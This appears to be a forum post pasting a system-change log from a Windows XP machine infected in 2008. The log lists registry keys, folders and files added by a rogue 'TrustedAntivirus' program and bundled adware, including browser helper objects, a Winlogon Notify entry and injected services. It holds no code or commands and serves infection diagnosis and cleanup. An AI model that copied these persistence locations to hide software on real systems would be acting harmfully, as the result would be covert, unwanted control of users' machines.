HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Programmable
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID
HKEY_CLASSES_ROOT\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\ProgID
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\Programmable
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\VersionIndependentProgID
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\ProgID
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\Programmable
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\VersionIndependentProgID
HKEY_CLASSES_ROOT\InetCtls.Inet
HKEY_CLASSES_ROOT\InetCtls.Inet\CLSID
HKEY_CLASSES_ROOT\InetCtls.Inet\CurVer
HKEY_CLASSES_ROOT\InetCtls.Inet.1
HKEY_CLASSES_ROOT\InetCtls.Inet.1\CLSID
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB\CLSID
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB\CurVer
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB.1
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB.1\CLSID
HKEY_CLASSES_ROOT\SBIEBHO.IEFW
HKEY_CLASSES_ROOT\SBIEBHO.IEFW\CLSID
HKEY_CLASSES_ROOT\SBIEBHO.IEFW\CurVer
HKEY_CLASSES_ROOT\SBIEBHO.IEFW.2
HKEY_CLASSES_ROOT\SBIEBHO.IEFW.2\CLSID
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\HELPDIR
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\HELPDIR
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\HELPDIR
HKEY_CLASSES_ROOT\WR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\24ebc7a7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DownloadManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{22342B44-5B98-4B30-9D53-C182AD8DF217}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C3F6257-3E00-45C2-88D5-CB0F3A17BF0E}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3877C2CD-F137-4144-BDB2-0A811492F920}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A394E835-C8D6-4B4B-884B-D2709059F3BE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Outerinfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UAVUN_is1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fccbbya
HKEY_LOCAL_MACHINE\SOFTWARE\Products
HKEY_LOCAL_MACHINE\SOFTWARE\Rhao
HKEY_LOCAL_MACHINE\SOFTWARE\TrustedAntivirus
HKEY_LOCAL_MACHINE\SOFTWARE\TrustedAntivirus\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\ugac
HKEY_LOCAL_MACHINE\SOFTWARE\xpre
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mchInjDrv\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Network Monitor\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mchInjDrv\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor\Security


Values added & changed: Click to view attachment

Disk contents.
QUOTE
Drives tracked: 1
-----------------
* c:\

Folders added:
-----------------
c:\Documents and Settings\All Users\Application Data\SalesMon
c:\Documents and Settings\All Users\Application Data\SalesMon\Data
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802
c:\Documents and Settings\KLY\Local Settings\Temp\ScnTmp
c:\Documents and Settings\LocalService\Application Data\NetMon
c:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Internet Explorer
c:\Documents and Settings\NetworkService\Application Data\NetMon
c:\Program Files\Common Files\TrustedAntivirus
c:\Program Files\Network Monitor
c:\Program Files\TrustedAntivirus
c:\Program Files\TrustedAntivirus\Config
c:\Program Files\TrustedAntivirus\Dat
c:\Program Files\TrustedAntivirus\Engines
c:\Program Files\TrustedAntivirus\Engines\AWBase
c:\Program Files\TrustedAntivirus\Engines\AWBase\database
c:\Program Files\TrustedAntivirus\Engines\PGBase
c:\Program Files\TrustedAntivirus\Engines\plugins
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate
c:\Program Files\TrustedAntivirus\Graphics
c:\Program Files\TrustedAntivirus\LA
c:\Program Files\TrustedAntivirus\Tools
c:\Program Files\TrustedAntivirus\Up
c:\Program Files\TrustedAntivirus\Up\Download
c:\Temp
c:\Temp\1cb
c:\Temp\sanR24
c:\TrustedAntivirus
c:\TrustedAntivirus\AVQuar
c:\WINDOWS\S0xZ
c:\WINDOWS\system32\ax9
c:\WINDOWS\system32\bv2
c:\WINDOWS\system32\ev4
c:\WINDOWS\system32\iDlo01

Files added:
----------------
c:\Documents and Settings\All Users\Desktop\TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,599 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\Contact Customer Support.lnk
Date: 3/6/2008 11:02 PM
Size: 1,567 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,611 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\Uninstall TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,652 bytes
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs\threats.log
Date: 3/6/2008 11:02 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs\update.log
Date: 3/6/2008 11:05 PM
Size: 4,251 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\~DF7077.tmp
Date: 3/6/2008 11:05 PM
Size: 327,680 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\~uavsetup.exe
Date: 3/6/2008 11:01 PM
Size: 15,712,233 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\removalfile.bat
Date: 3/6/2008 10:50 PM
Size: 43 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\sqlite_5J4QbTdgCcOLwo2
Date: 3/6/2008 11:03 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\sqlite_rEvawTY4Fgm0efD
Date: 3/6/2008 11:02 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\yazzsnet.exe
Date: 3/6/2008 10:37 PM
Size: 218,632 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp\UGA6P_0001_N122M2802NetInstaller.exe
Date: 2/28/2008 4:57 PM
Size: 185,344 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp\UGA6P_0001_N122M2802NetInstaller.inf
Date: 2/28/2008 4:57 PM
Size: 230 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\settings.ini
Date: 3/6/2008 11:03 PM
Size: 23 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\setup.exe
Date: 3/6/2008 11:00 PM
Size: 15,760,928 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\setup.len
Date: 3/6/2008 10:58 PM
Size: 4 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\CA6P2ZCX.HTM
Date: 3/6/2008 10:33 PM
Size: 1,176 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\CASNUHWN.HTM
Date: 3/6/2008 10:44 PM
Size: 1,176 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\serve[1].htm
Date: 3/6/2008 10:31 PM
Size: 945 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\install_en[1].cab
Date: 3/6/2008 10:44 PM
Size: 102,666 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\placeholder-1786909-2517323253[1].htm
Date: 3/6/2008 10:31 PM
Size: 1,443 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\tc2[1].txt
Date: 3/6/2008 11:03 PM
Size: 4,778 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\CAF2O7NP.htm
Date: 3/6/2008 10:44 PM
Size: 125 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\CASP67K1.htm
Date: 3/6/2008 11:03 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\data[1].htm
Date: 3/6/2008 10:44 PM
Size: 25,507 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLURCDYF\winavp[1].htm
Date: 3/6/2008 10:45 PM
Size: 502 bytes
c:\Documents and Settings\KLY\Start Menu\Programs\Startup\DW_Start.lnk
Date: 3/6/2008 10:47 PM
Size: 0 bytes
c:\Documents and Settings\LocalService\Application Data\NetMon\domains.txt
Date: 3/6/2008 11:07 PM
Size: 14 bytes
c:\Documents and Settings\LocalService\Application Data\NetMon\log.txt
Date: 3/6/2008 11:07 PM
Size: 372 bytes
c:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
Date: 3/6/2008 11:03 PM
Size: 16,384 bytes
c:\Documents and Settings\LocalService\Local Settings\History\History.IE5\MSHist012008030620080307\index.dat
Date: 3/6/2008 11:03 PM
Size: 32,768 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\1IXK5YVH\march_of_dimes_bg[1].gif
Date: 3/6/2008 11:03 PM
Size: 319 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\8XOTC1Z9\command_small[1].gif
Date: 3/6/2008 11:03 PM
Size: 2,417 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\8XOTC1Z9\march_of_dimes[1].gif
Date: 3/6/2008 11:03 PM
Size: 24,981 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KFCF67AN\intro[1].htm
Date: 3/6/2008 11:03 PM
Size: 2,317 bytes
c:\Documents and Settings\NetworkService\Application Data\NetMon\domains.txt
Date: 3/6/2008 10:54 PM
Size: 14 bytes
c:\Documents and Settings\NetworkService\Application Data\NetMon\log.txt
Date: 3/6/2008 10:54 PM
Size: 248 bytes
c:\Program Files\Common Files\Yazzle1281OinAdmin.exe
Date: 1/15/2008 10:52 PM
Size: 140,800 bytes
c:\Program Files\Common Files\Yazzle1281OinUninstaller.exe
Date: 3/6/2008 10:50 PM
Size: 41,723 bytes
c:\Program Files\Common Files\TrustedAntivirus\bm.exe
Date: 12/20/2007 8:12 PM
Size: 425,984 bytes
c:\Program Files\Common Files\TrustedAntivirus\ugac.exe
Date: 5/22/2007 1:06 PM
Size: 271,360 bytes
c:\Program Files\Internet Explorer\xabe89104.dll
Date: 2/8/2008 2:07 AM
Size: 217,088 bytes
c:\Program Files\Network Monitor\netmon.exe
Date: 1/4/2006 6:09 PM
Size: 94,208 bytes
c:\Program Files\TrustedAntivirus\Activate.exe
Date: 7/31/2007 8:13 AM
Size: 152,064 bytes
c:\Program Files\TrustedAntivirus\al.dat
Date: 11/7/2007 5:31 PM
Size: 131 bytes
c:\Program Files\TrustedAntivirus\dhlp.dll
Date: 12/6/2007 8:20 PM
Size: 196,608 bytes
c:\Program Files\TrustedAntivirus\FWSettings.bin
Date: 3/6/2008 11:02 PM
Size: 18 bytes
c:\Program Files\TrustedAntivirus\history.db
Date: 3/6/2008 11:03 PM
Size: 23,552 bytes
c:\Program Files\TrustedAntivirus\main.log
Date: 3/6/2008 11:03 PM
Size: 790 bytes
c:\Program Files\TrustedAntivirus\pgs.exe
Date: 12/7/2007 11:03 AM
Size: 2,097,152 bytes
c:\Program Files\TrustedAntivirus\ptask.exe
Date: 11/27/2007 5:31 PM
Size: 28,672 bytes
c:\Program Files\TrustedAntivirus\reload.exe
Date: 11/27/2007 5:31 PM
Size: 161,792 bytes
c:\Program Files\TrustedAntivirus\ResErrors.log
Date: 3/6/2008 11:08 PM
Size: 84,524 bytes
c:\Program Files\TrustedAntivirus\scnkrnl.dll
Date: 11/27/2007 5:29 PM
Size: 569,344 bytes
c:\Program Files\TrustedAntivirus\settings.ini
Date: 3/6/2008 11:02 PM
Size: 1,641 bytes
c:\Program Files\TrustedAntivirus\sqlite3.dll
Date: 8/9/2006 10:29 AM
Size: 247,232 bytes
c:\Program Files\TrustedAntivirus\sr.log
Date: 3/6/2008 11:02 PM
Size: 232 bytes
c:\Program Files\TrustedAntivirus\unins000.dat
Date: 3/6/2008 11:02 PM
Size: 33,887 bytes
c:\Program Files\TrustedAntivirus\unins000.exe
Date: 3/6/2008 11:01 PM
Size: 682,364 bytes
c:\Program Files\TrustedAntivirus\Config\pgs.xml
Date: 3/6/2008 11:01 PM
Size: 8,819,841 bytes
c:\Program Files\TrustedAntivirus\Dat\Activate.dat
Date: 3/6/2008 11:02 PM
Size: 314 bytes
c:\Program Files\TrustedAntivirus\Dat\BkSites.dat
Date: 10/31/2007 12:20 PM
Size: 283,541 bytes
c:\Program Files\TrustedAntivirus\Dat\bnlink.dat
Date: 3/6/2008 11:02 PM
Size: 220 bytes
c:\Program Files\TrustedAntivirus\Dat\cd.dat
Date: 11/14/2007 11:15 AM
Size: 119 bytes
c:\Program Files\TrustedAntivirus\Dat\incmp.dat
Date: 4/5/2006 10:00 AM
Size: 129 bytes
c:\Program Files\TrustedAntivirus\Dat\index.dat
Date: 12/14/2006 3:17 PM
Size: 6 bytes
c:\Program Files\TrustedAntivirus\Dat\pv.dat
Date: 3/6/2008 11:02 PM
Size: 9 bytes
c:\Program Files\TrustedAntivirus\Engines\AWBase\vbpv.dat
Date: 7/13/2007 11:12 AM
Size: 10 bytes
c:\Program Files\TrustedAntivirus\Engines\AWBase\database\enemies.dat
Date: 7/13/2007 11:09 AM
Size: 11,642,713 bytes
c:\Program Files\TrustedAntivirus\Engines\PGBase\vbpv.dat
Date: 8/1/2005 3:42 PM
Size: 8 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\BORLNDMM.DLL
Date: 5/8/2007 12:10 PM
Size: 22,528 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANADWR.DLL
Date: 5/8/2007 11:58 AM
Size: 246,310 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANBCDR.DLL
Date: 5/8/2007 11:59 AM
Size: 913,355 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANDLDR.DLL
Date: 5/8/2007 12:00 PM
Size: 1,123,285 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANDOS1.DLL
Date: 5/8/2007 12:02 PM
Size: 1,265,683 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANEMUL.DLL
Date: 5/8/2007 12:02 PM
Size: 28,301 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANFUNC.DLL
Date: 5/8/2007 12:02 PM
Size: 63,004 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANKRNL.DLL
Date: 11/23/2007 4:47 PM
Size: 293,888 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANMCR1.DLL
Date: 5/8/2007 12:08 PM
Size: 200,849 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANOTHR.DLL
Date: 5/8/2007 12:03 PM
Size: 40,707 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANSCR.DLL
Date: 5/8/2007 11:57 AM
Size: 276,532 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANTOOL.DLL
Date: 5/8/2007 12:03 PM
Size: 114,320 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANTROJ.DLL
Date: 5/8/2007 12:03 PM
Size: 1,045,102 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANWIN1.DLL
Date: 5/8/2007 12:04 PM
Size: 836,351 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNACPU.DLL
Date: 5/8/2007 12:04 PM
Size: 9,728 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNADBX.DLL
Date: 5/8/2007 12:10 PM
Size: 286,720 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\unamscan.dll
Date: 5/8/2007 12:10 PM
Size: 47,616 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNMIME.DLL
Date: 5/8/2007 12:04 PM
Size: 44,202 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACK.DLL
Date: 5/8/2007 12:10 PM
Size: 331,275 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACKS.DLL
Date: 5/8/2007 12:04 PM
Size: 373,419 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACKS2.DLL
Date: 5/8/2007 12:06 PM
Size: 73,091 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPEPACK.DLL
Date: 5/8/2007 12:04 PM
Size: 69,211 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\vbpv.dat
Date: 5/8/2007 12:12 PM
Size: 10 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27601.DLL
Date: 5/8/2007 11:57 AM
Size: 113,369 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27602.DLL
Date: 5/8/2007 11:56 AM
Size: 153,123 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27603.DLL
Date: 5/8/2007 11:56 AM
Size: 165,473 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27604.DLL
Date: 5/8/2007 11:56 AM
Size: 170,921 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UADAILY.DLL
Date: 5/8/2007 11:55 AM
Size: 65,256 bytes
c:\Program Files\TrustedAntivirus\Graphics\cross.gif
Date: 2/7/2006 11:40 AM
Size: 1,681 bytes
c:\Program Files\TrustedAntivirus\Graphics\ga6p.gif
Date: 12/15/2006 12:24 PM
Size: 4,151 bytes
